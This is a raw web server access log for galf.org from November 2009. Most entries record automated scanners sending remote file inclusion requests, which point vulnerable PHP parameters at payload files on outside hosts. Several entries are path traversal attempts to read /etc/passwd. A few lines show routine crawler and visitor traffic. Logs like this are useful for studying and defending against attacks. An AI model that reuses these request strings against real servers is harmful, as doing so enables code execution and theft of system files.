67.227.134.140 - - [09/Nov/2009:01:22:07 -0800] "GET /logs/access_090601.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:22:10 -0800] "GET /logs/access_090720.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:22:30 -0800] "GET /logs/access_090316.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [09/Nov/2009:01:25:32 -0800] "GET /logs/access_090824.log//admin/business_inc/saveserver.php?thisdir=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [09/Nov/2009:01:25:32 -0800] "GET /admin/business_inc/saveserver.php?thisdir=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [09/Nov/2009:01:25:32 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.115.176 - - [09/Nov/2009:01:25:40 -0800] "GET /logs/access_090831.log HTTP/1.0" 200 3068812 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
81.176.229.7 - - [09/Nov/2009:01:25:46 -0800] "GET /logs///vwar/backup/errors.php?error=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [09/Nov/2009:01:25:46 -0800] "GET //vwar/backup/errors.php?error=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [09/Nov/2009:01:25:47 -0800] "GET /logs/access_090907.log//admin/business_inc/saveserver.php?thisdir=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
205.209.53.68 - - [09/Nov/2009:01:26:25 -0800] "GET /logs/access.log//box_display.php?box=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
205.209.53.68 - - [09/Nov/2009:01:26:25 -0800] "GET /logs//box_display.php?box=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
205.209.53.68 - - [09/Nov/2009:01:26:26 -0800] "GET /box_display.php?box=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
93.158.148.30 - - [09/Nov/2009:01:26:47 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
211.233.89.196 - - [09/Nov/2009:01:27:39 -0800] "GET /include/mail.inc.php?skin_board_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.89.196 - - [09/Nov/2009:01:27:39 -0800] "GET /logs//include/mail.inc.php?skin_board_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.89.196 - - [09/Nov/2009:01:27:39 -0800] "GET /logs/access_090511.log//include/mail.inc.php?skin_board_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
205.209.53.68 - - [09/Nov/2009:01:27:56 -0800] "GET /box_display.php?box=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
62.149.231.176 - - [09/Nov/2009:01:31:06 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.boy.4fap.org/uploads/1257668713.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.149.231.176 - - [09/Nov/2009:01:31:06 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.boy.4fap.org/uploads/1257668713.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.149.231.176 - - [09/Nov/2009:01:31:09 -0800] "GET /logs/access_090615.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.boy.4fap.org/uploads/1257668713.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.227.134.140 - - [09/Nov/2009:01:31:26 -0800] "GET /logs/access_090615.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.227.134.140 - - [09/Nov/2009:01:31:30 -0800] "GET /logs/access_090601.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.149.231.176 - - [09/Nov/2009:01:32:16 -0800] "GET /logs/access_090601.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.boy.4fap.org/uploads/1257668713.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.115.176 - - [09/Nov/2009:01:32:46 -0800] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
62.149.231.176 - - [09/Nov/2009:01:35:43 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.boy.4fap.org/uploads/1257668713.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.149.231.176 - - [09/Nov/2009:01:35:43 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.boy.4fap.org/uploads/1257668713.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.149.231.176 - - [09/Nov/2009:01:35:49 -0800] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.boy.4fap.org/uploads/1257668713.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.115.176 - - [09/Nov/2009:01:36:30 -0800] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
200.117.43.112 - - [09/Nov/2009:01:37:47 -0800] "GET /logs/ HTTP/1.1" 200 4942 "http://www.google.com.ar/url?sa=t&source=web&ct=res&cd=1&ved=0CAoQFjAA&url=http%3A%2F%2Fwww.galf.org%2Flogs%2F&rct=j&q=index+of+%2F..%2F..%2Flogs&ei=5-L3SsKSJYyMuAeposC1AQ&usg=AFQjCNHxPdRWtvkkSW5L74xwOZb_30Yffg" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20" "www.galf.org"
200.117.43.112 - - [09/Nov/2009:01:37:49 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20" "www.galf.org"
94.79.54.195 - - [09/Nov/2009:01:38:10 -0800] "GET /logs/access_090824.log%20%20//admin/business_inc/saveserver.php?thisdir=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:38:14 -0800] "GET /logs/access_090406.log/?sourcedir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:38:14 -0800] "GET /logs/access_090615.log/?sourcedir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:38:14 -0800] "GET /logs/?sourcedir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:38:14 -0800] "GET /?sourcedir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:38:17 -0800] "GET /logs/access_090406.log/?sourcedir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [09/Nov/2009:01:38:20 -0800] "GET /logs/access_090907.log%20%20//admin/business_inc/saveserver.php?thisdir=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.117.43.112 - - [09/Nov/2009:01:38:31 -0800] "GET /logs/access_090810.log HTTP/1.1" 200 4806214 "http://www.galf.org/logs/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:38:45 -0800] "GET /?sourcedir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:38:45 -0800] "GET /logs/access_090518.log/?sourcedir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:38:45 -0800] "GET /logs/?sourcedir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:39:10 -0800] "GET /logs/access_090921.log/?sourcedir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:39:10 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:39:10 -0800] "GET /?sourcedir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:39:10 -0800] "GET /logs/?sourcedir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
65.55.37.203 - - [09/Nov/2009:01:39:28 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
200.117.43.112 - - [09/Nov/2009:01:39:42 -0800] "GET /logs/access_091109.log HTTP/1.1" 200 7313381 "http://www.galf.org/logs/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20" "www.galf.org"
64.8.105.21 - - [09/Nov/2009:01:40:10 -0800] "GET /logs/access_090803.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
64.8.105.21 - - [09/Nov/2009:01:40:10 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
64.8.105.21 - - [09/Nov/2009:01:40:10 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
216.139.67.116 - - [09/Nov/2009:01:40:30 -0800] "GET /logs/access_090803.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.64" "www.galf.org"
216.139.67.116 - - [09/Nov/2009:01:40:30 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.64" "www.galf.org"
216.139.67.116 - - [09/Nov/2009:01:40:30 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.64" "www.galf.org"
85.236.46.4 - - [09/Nov/2009:01:40:54 -0800] "GET /logs/access_090803.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
85.236.46.4 - - [09/Nov/2009:01:40:54 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
85.236.46.4 - - [09/Nov/2009:01:40:54 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
62.149.231.176 - - [09/Nov/2009:01:41:04 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.boy.4fap.org/uploads/1257668713.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.149.231.176 - - [09/Nov/2009:01:41:04 -0800] "GET /logs/access_090601.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.boy.4fap.org/uploads/1257668713.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.149.231.176 - - [09/Nov/2009:01:41:04 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.boy.4fap.org/uploads/1257668713.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.81.41 - - [09/Nov/2009:01:42:00 -0800] "GET /include/write.php?dir=http://www.displayplus.net/bbs//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.81.41 - - [09/Nov/2009:01:42:00 -0800] "GET /logs//include/write.php?dir=http://www.displayplus.net/bbs//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.81.41 - - [09/Nov/2009:01:42:00 -0800] "GET /logs/access_090309.log%20%20//include/write.php?dir=http://www.displayplus.net/bbs//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.81.41 - - [09/Nov/2009:01:42:39 -0800] "GET /include/write.php?dir=http://www.displayplus.net/bbs//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.121.81.41 - - [09/Nov/2009:01:42:39 -0800] "GET /logs//include/write.php?dir=http://www.displayplus.net/bbs//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.121.81.41 - - [09/Nov/2009:01:42:39 -0800] "GET /logs/access.log%20%20//include/write.php?dir=http://www.displayplus.net/bbs//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.149.231.176 - - [09/Nov/2009:01:43:24 -0800] "GET /logs/access_090615.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.boy.4fap.org/uploads/1257668713.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.14.90.22 - - [09/Nov/2009:01:43:42 -0800] "GET /xmlrpc.php HTTP/1.1" 404 - "-" "-" "www.galf.org"
207.58.164.77 - - [09/Nov/2009:01:44:05 -0800] "GET /v2/index.phphttp://204.3.167.134/xxx?????????????????????????????????????????????????????????????????????????????????????????????????&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
64.8.105.21 - - [09/Nov/2009:01:44:15 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
64.8.105.21 - - [09/Nov/2009:01:44:15 -0800] "GET /logs/access_090316.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
64.8.105.21 - - [09/Nov/2009:01:44:15 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
64.8.105.21 - - [09/Nov/2009:01:44:18 -0800] "GET /logs/access_090803.log%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
85.236.46.4 - - [09/Nov/2009:01:44:19 -0800] "GET /logs/access_090316.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
85.236.46.4 - - [09/Nov/2009:01:44:19 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
85.236.46.4 - - [09/Nov/2009:01:44:19 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
216.139.67.116 - - [09/Nov/2009:01:44:19 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.64" "www.galf.org"
216.139.67.116 - - [09/Nov/2009:01:44:19 -0800] "GET /logs/access_090316.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.64" "www.galf.org"
216.139.67.116 - - [09/Nov/2009:01:44:19 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.64" "www.galf.org"
64.8.105.21 - - [09/Nov/2009:01:44:20 -0800] "GET /logs/access_090817.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
85.236.46.4 - - [09/Nov/2009:01:44:24 -0800] "GET /logs/access_090817.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
216.139.67.116 - - [09/Nov/2009:01:44:24 -0800] "GET /logs/access_090817.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.64" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:44:25 -0800] "GET /logs/access_091012.log/?sourcedir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:44:25 -0800] "GET /?sourcedir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:44:25 -0800] "GET /logs/?sourcedir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
216.139.67.116 - - [09/Nov/2009:01:45:04 -0800] "GET /logs/access_090803.log%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.64" "www.galf.org"
216.75.32.231 - - [09/Nov/2009:01:45:36 -0800] "GET /logs/access_090608.log//main.php?sayfa=http://www.gzzsyy.com.cn/brd/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.75.32.231 - - [09/Nov/2009:01:45:36 -0800] "GET /logs//main.php?sayfa=http://www.gzzsyy.com.cn/brd/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.75.32.231 - - [09/Nov/2009:01:45:36 -0800] "GET /main.php?sayfa=http://www.gzzsyy.com.cn/brd/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.75.32.231 - - [09/Nov/2009:01:45:44 -0800] "GET /logs/access_090803.log//main.php?sayfa=http://www.gzzsyy.com.cn/brd/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.236.46.4 - - [09/Nov/2009:01:45:49 -0800] "GET /logs/access_090803.log%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
216.75.32.231 - - [09/Nov/2009:01:46:46 -0800] "GET /logs/access_090608.log%20%20//main.php?sayfa=http://www.gzzsyy.com.cn/brd/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.75.32.231 - - [09/Nov/2009:01:46:46 -0800] "GET /logs/access_090803.log%20%20//main.php?sayfa=http://www.gzzsyy.com.cn/brd/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.110.55.53 - - [09/Nov/2009:01:46:55 -0800] "GET /include/mail.inc.php?skin_board_path=http://gosiup.co.kr/zboard/icon/com_sef/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.110.55.53 - - [09/Nov/2009:01:46:55 -0800] "GET /logs//include/mail.inc.php?skin_board_path=http://gosiup.co.kr/zboard/icon/com_sef/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.110.55.53 - - [09/Nov/2009:01:46:55 -0800] "GET /logs/access_090511.log//include/mail.inc.php?skin_board_path=http://gosiup.co.kr/zboard/icon/com_sef/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.8.105.21 - - [09/Nov/2009:01:48:50 -0800] "GET /logs/access_090817.log%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
85.236.46.4 - - [09/Nov/2009:01:49:44 -0800] "GET /logs/access_090817.log%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
216.139.67.116 - - [09/Nov/2009:01:49:48 -0800] "GET /logs/access_090817.log%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.64" "www.galf.org"
65.55.37.203 - - [09/Nov/2009:01:50:02 -0800] "GET /logs/access_080526.log HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:51:37 -0800] "GET /logs/access_090810.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:51:37 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:51:37 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.81.41 - - [09/Nov/2009:01:51:42 -0800] "GET /logs/access_090720.log//errors.php?error=http://www.displayplus.net/bbs//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.81.41 - - [09/Nov/2009:01:51:42 -0800] "GET /errors.php?error=http://www.displayplus.net/bbs//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.81.41 - - [09/Nov/2009:01:51:42 -0800] "GET /logs//errors.php?error=http://www.displayplus.net/bbs//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.81.41 - - [09/Nov/2009:01:52:13 -0800] "GET /logs/access_090831.log//errors.php?error=http://www.displayplus.net/bbs//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:01:52:18 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:01:52:18 -0800] "GET /logs/access_090720.log//admin/spaw/spaw_control.class.php?spaw_root=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:01:52:18 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:01:52:23 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:01:52:23 -0800] "GET /logs/access_090720.log//admin/spaw/spaw_control.class.php?spaw_root=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:01:52:23 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:01:52:34 -0800] "GET /logs/access_090629.log//admin/spaw/spaw_control.class.php?spaw_root=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:01:52:35 -0800] "GET /logs/access_090629.log//admin/spaw/spaw_control.class.php?spaw_root=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:52:37 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:52:37 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:52:37 -0800] "GET /logs/access_090810.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:52:45 -0800] "GET /logs/access_090316.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:52:46 -0800] "GET /logs/access_090413.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:52:46 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:52:46 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
